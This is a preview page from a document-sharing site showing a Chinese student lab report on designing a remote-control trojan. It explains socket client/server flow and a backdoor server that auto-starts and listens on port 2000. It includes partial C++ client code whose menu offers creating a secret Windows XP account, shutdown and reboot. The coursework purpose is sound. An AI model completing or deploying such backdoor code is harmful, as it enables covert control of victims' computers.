远程控制与木马程序设计

远程控制与木马程序设计

ID:15420756

大小:121.50 KB

页数:9页

时间:2018-08-03

远程控制与木马程序设计_第1页
远程控制与木马程序设计_第2页
远程控制与木马程序设计_第3页
远程控制与木马程序设计_第4页
远程控制与木马程序设计_第5页
资源描述:

《远程控制与木马程序设计》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、81实验题目远程控制与木马程序设计2实验目的l掌握远程控制的一般原理与类型,实现利用网络scoket套接字完成计算机远程通信过程,学生深入理解和掌握基于TCP/IP协议的网络通信概念、原理,以及网络客户机/服务器模型的结构概念。l熟悉常用的WindowsAPI函数的用法,利用C++或VB语言实现木马程序的设计。3实验条件和环境lWindowsXPSP3lMicrosoftVirtualC++4实验方法(系统功能、结构设计,软件流程图等)l利用Socket进行网络远程通信设计使用套接字Socket在两台计算机实现通信过程中,首先假设一

2、台是服务端,另一台是客户端。服务端先启动,建立一个套接字Socket,并对相应的IP和端口进行绑定、监听;客户端也建立一个套接字Socket,并对其相应的IP和端口进行绑定,然后与服务端连接,待其相应后,双方可以实现远程通信。服务端流程如下:socket()->bind()->listen()->accept()->recv()/send()->closesocket()客户端流程如下:socket()->connect()->recv()/send()->closesocket()l远程控制与木马程序远程控制实际上是包含有服务器端

3、和客户端的一套程序服务器端程序驻留在目标计算机里,随着系统启动而自行启动。此外,使用传统技术的程序会在某端口进行监听,若接收到数据就对其进行识别,然后按照识别后的命令在目标计算机上执行一些操作(比如窃取口令,拷贝或删除文件,或重启计算机等)。8攻击者一般在入侵成功后,将服务端程序拷贝到目标计算机中,并设法使其运行,从而留下后门。日后,攻击者就能够通过运行客户端程序,来对目标计算机进行操作。总体流程:通过C/S运行模式并结合进程与匿名管道技术来实现的,主体分为两部分:即客户端和服务端木马程序。其原理为服务端程序在目标计算机中采用自动运

4、行模式,并打开2000端口进行监听,当客户端向服务端主动提出连接请求,服务端木马程序就会自动运行,来应答客户端的请求,从而建立连接,服务段木马程序根据客户端的指令而执行相应的操作。软件流程图:81实验结果及结论2附录:程序清单及说明客户端程序:#include//包含标准输入输出库#include//包含windows套接字函数#pragmacomment(lib,"Ws2_32")//将注释wsock32放置到lib文件中,否则需要加载#defineMAXSIZE2048//每次可以接收的最

5、大字节#defineSEND_PORT2000//与木马程序连接的端口为2000structsockaddr_inClientAddr;//对方的地址端口信息SOCKETsock;//定义套接字变量,为全局变量DWORDstartSock()//建立套接字功能模块{WSADATAWSAData;//将WSAData的数据类型声明为WSADATAif(WSAStartup(MAKEWORD(2,2),&WSAData)!=0){8//MAKEWORD(2,2)预定义Winsock版本,初始化套接字printf("sockinitfai

6、l");return(-1);}sock=socket(AF_INET,SOCK_STREAM,0);//连接对方return1;}intmain(intargc,char*argv[]){u_intnumbyte;charbuf[MAXSIZE];//传送数据的缓冲区if(argc!=2){//需要有服务端ip参数,格式:client.exeIP地址fprintf(stderr,"usage:clienthostname");exit(1);}startSock();//调用建立套接字功能函数ClientAddr.sin_fa

7、mily=AF_INET;//协议类型是INETClientAddr.sin_port=htons(SEND_PORT);//连接对方2000端口ClientAddr.sin_addr.s_addr=inet_addr(argv[1]);//连接对方的IP地址connect(sock,(structsockaddr*)&ClientAddr,sizeof(structsockaddr));printf("------------远程控制木马程序菜单-------------r");printf("test--检测连接r"

8、);printf("add--建立Windowsxp系统的秘密帐号r");printf("shutdownxp--关闭Windowsxp计算机r");printf("resetxp--重新启动Windowsxp计算机r

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。